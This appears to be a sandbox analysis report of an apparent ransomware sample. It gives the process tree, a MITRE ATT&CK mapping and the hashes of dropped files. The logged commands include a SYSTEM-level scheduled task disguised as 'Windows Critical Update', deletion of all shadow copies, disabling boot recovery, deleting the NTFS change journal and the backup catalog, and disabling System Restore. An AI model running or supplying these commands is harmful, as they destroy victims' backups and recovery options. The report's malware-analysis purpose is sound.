  [depth 3] C:\Windows\system32\schtasks.exe (PID 2864)
    SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\fa7d412e2655b0b5075ac35188610f2667995a034a6fd7d1c1efd5194be348a9.exe" /F
    - Creates scheduled task(s)

[depth 2] C:\Windows\System32\cmd.exe (PID 2756)
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  [depth 3] C:\Windows\system32\vssadmin.exe (PID 1824)
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    - Enumerates connected drives
    - Interacts with shadow copies

[depth 2] C:\Windows\System32\cmd.exe (PID 2608)
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
  [depth 3] C:\Windows\system32\vssadmin.exe (PID 2304)
    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
    - Enumerates connected drives
    - Interacts with shadow copies

[depth 2] C:\Windows\System32\cmd.exe (PID 1708)
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  [depth 3] C:\Windows\system32\vssadmin.exe (PID 2508)
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    - Interacts with shadow copies

[depth 2] C:\Windows\System32\cmd.exe (PID 1716)
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
  [depth 3] C:\Windows\system32\vssadmin.exe (PID 1448)
    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    - Interacts with shadow copies

[depth 2] C:\Windows\System32\cmd.exe (PID 2620)
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  [depth 3] C:\Windows\system32\vssadmin.exe (PID 1752)
    vssadmin.exe Delete Shadows /all /quiet
    - Interacts with shadow copies
[depth 2] C:\Windows\System32\cmd.exe (PID 1224)
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
  [depth 3] C:\Windows\system32\bcdedit.exe (PID 2004)
    bcdedit /set {default} recoveryenabled No
    - Modifies boot configuration data using bcdedit

[depth 2] C:\Windows\System32\cmd.exe (PID 2192)
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  [depth 3] C:\Windows\system32\bcdedit.exe (PID 2436)
    bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - Modifies boot configuration data using bcdedit

[depth 2] C:\Windows\System32\cmd.exe (PID 3024)
  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
  [depth 3] C:\Windows\system32\fsutil.exe (PID 556)
    fsutil.exe usn deletejournal /D C:
    - Deletes NTFS Change Journal

[depth 2] C:\Windows\System32\cmd.exe (PID 3048)
  "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
  [depth 3] C:\Windows\system32\wbadmin.exe (PID 2380)
    wbadmin.exe delete catalog -quiet
    - Deletes backup catalog

[depth 2] C:\Windows\System32\cmd.exe (PID 1616)
  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  [depth 3] C:\Windows\system32\schtasks.exe (PID 1936)
    schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
[depth 1] C:\Windows\system32\vssvc.exe (PID 2024)
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken

[depth 1] C:\Windows\system32\wbengine.exe (PID 2208)
  "C:\Windows\system32\wbengine.exe"
  - Suspicious use of AdjustPrivilegeToken

[depth 1] C:\Windows\System32\vdsldr.exe (PID 2824)
  C:\Windows\System32\vdsldr.exe -Embedding

[depth 1] C:\Windows\System32\vds.exe (PID 2844)
  C:\Windows\System32\vds.exe
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify Tools (2)
- Indicator Removal (3)
  - File Deletion (3)
- Modify Registry (4)
Downloads
- Filesize: 1KB
  MD5: 85bc0dc9874a7bb3be13a1df00f5881c
  SHA1: 79d6e1c0738bf887f25b2e8f2336432c6a1ce14f
  SHA256: 8c363beba852daa5c0673f6509832ed292de09d05c614459862e4472c8764da5
  SHA512: e46935c0dc5f551e3c5c5fd1535672c95049a3b41e0aac1ed2e5cf03462fa5b973c49a4c1b581aaf6f1717163b7b7d3efce732b8dec0efe3da0c52058cb7fae1
- Filesize: 12KB
  MD5: 3dcc3a07bcebf33888ea464a371497a4
  SHA1: 7c8d700bd534fabdf52ef83b93656ac67c216ed8
  SHA256: f3a9cff0e6a93af6ff45604e0ec1142bb94ee5ed898f422e9fc8919206662904
  SHA512: 4b07d926a64db4b941e9ad3ecf158d1f4203687457e72d9f322275c48fa03ba04a12d2db42ee02cc226d753ff313249e5ff28ad1982ddcab3799ca02141ff2a4
- Filesize: 684B
  MD5: 49ef359f47c57fb23df230392cf9fedc
  SHA1: ae8f04b0052a51932da4b22ef0f4032f360ace51
  SHA256: aaee97f31ca8b741783d5df93c51b7c89810bd76df488039063325040242f95f
  SHA512: a18e4e1a9e84756d27027dc8ffdb09b4dcbdffab0fa278250c730fe3f8c64aa81d91b7a0b7e51e8ecd3b84216696e244a0874f5069abb1ad6ce3b82922d34910